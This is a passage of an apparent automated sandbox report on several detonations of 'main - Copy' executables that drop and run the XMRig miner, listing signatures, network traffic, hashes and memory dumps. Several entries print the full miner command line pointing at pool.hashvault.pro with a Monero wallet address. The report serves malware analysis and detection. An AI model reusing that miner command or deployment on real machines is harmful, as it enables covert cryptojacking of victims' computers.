a31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4476 wrote to memory of 2376 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4476 wrote to memory of 2376 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=3960 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3464,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=4592 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2376-16-0x00000249798B0000-0x00000249798D0000-memory.dmp
memory/2376-17-0x0000024A0D560000-0x0000024A0D580000-memory.dmp
memory/2376-18-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-19-0x0000024A0DBD0000-0x0000024A0DBF0000-memory.dmp
memory/2376-20-0x0000024A0D9A0000-0x0000024A0D9C0000-memory.dmp
memory/2376-21-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-22-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-25-0x0000024A0D9A0000-0x0000024A0D9C0000-memory.dmp
memory/2376-24-0x0000024A0DBD0000-0x0000024A0DBF0000-memory.dmp
memory/2376-23-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-26-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-27-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-28-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-29-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-30-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-31-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-32-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-33-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-34-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-35-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-36-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-37-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-38-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-39-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-40-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-41-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-42-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-43-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-44-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-45-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-46-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-47-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-48-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-49-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-50-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-51-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-52-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-53-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-54-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-55-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-56-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-57-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-58-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-59-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-60-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-61-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-62-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-63-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-64-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-65-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-66-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-67-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-68-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-69-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-70-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-71-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-72-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-73-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-74-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-75-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-76-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-77-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-78-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-79-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-80-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-81-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-82-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-83-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-84-0x00007FF632640000-0x00007FF633143000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240426-en
Max time kernel
1796s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3124 wrote to memory of 3936 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3124 wrote to memory of 3936 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3936-16-0x0000022188640000-0x0000022188660000-memory.dmp
memory/3936-17-0x000002221A9F0000-0x000002221AA10000-memory.dmp
memory/3936-18-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-20-0x000002221B060000-0x000002221B080000-memory.dmp
memory/3936-19-0x000002221B040000-0x000002221B060000-memory.dmp
memory/3936-21-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-22-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-25-0x000002221B060000-0x000002221B080000-memory.dmp
memory/3936-24-0x000002221B040000-0x000002221B060000-memory.dmp
memory/3936-23-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-26-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-27-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-28-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-29-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-30-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-31-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-32-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-33-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-34-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-35-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-36-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-37-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-38-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-39-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-40-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-41-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-42-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-43-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-44-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-45-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-46-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-47-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-48-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-49-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-50-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-51-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-52-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-53-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-54-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-55-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-56-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-57-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-58-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-59-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-60-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-61-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-62-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-63-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-64-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-65-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-66-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-67-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-68-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-69-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-70-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-71-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-72-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-73-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-74-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-75-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-76-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-77-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-78-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-79-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-80-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-81-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-82-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-83-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-84-0x00007FF703B10000-0x00007FF704613000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2104 wrote to memory of 4444 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2104 wrote to memory of 4444 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4444-16-0x000001E8354D0000-0x000001E8354F0000-memory.dmp
memory/4444-17-0x000001E8C9230000-0x000001E8C9250000-memory.dmp
memory/4444-18-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-19-0x000001E8C9680000-0x000001E8C96A0000-memory.dmp
memory/4444-20-0x000001E8C98B0000-0x000001E8C98D0000-memory.dmp
memory/4444-21-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-22-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-23-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-24-0x000001E8C9680000-0x000001E8C96A0000-memory.dmp
memory/4444-25-0x000001E8C98B0000-0x000001E8C98D0000-memory.dmp
memory/4444-26-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-27-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-28-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-29-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-30-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-31-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-32-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-33-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-34-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-35-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-36-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-37-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-38-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-39-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-40-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-41-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-42-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-43-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-44-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-45-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-46-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-47-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-48-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-49-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-50-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-51-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-52-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-53-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-54-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-55-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-56-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-57-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-58-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-59-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-60-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-61-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-62-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-63-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-64-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-65-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-66-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-67-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-68-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-69-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-70-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-71-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-72-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-73-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-74-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-75-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-76-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-77-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-78-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-79-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-80-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-81-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-82-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-83-0x00007FF675300000-0x00007FF675E03000-memory.dmp
memory/4444-84-0x00007FF675300000-0x00007FF675E03000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
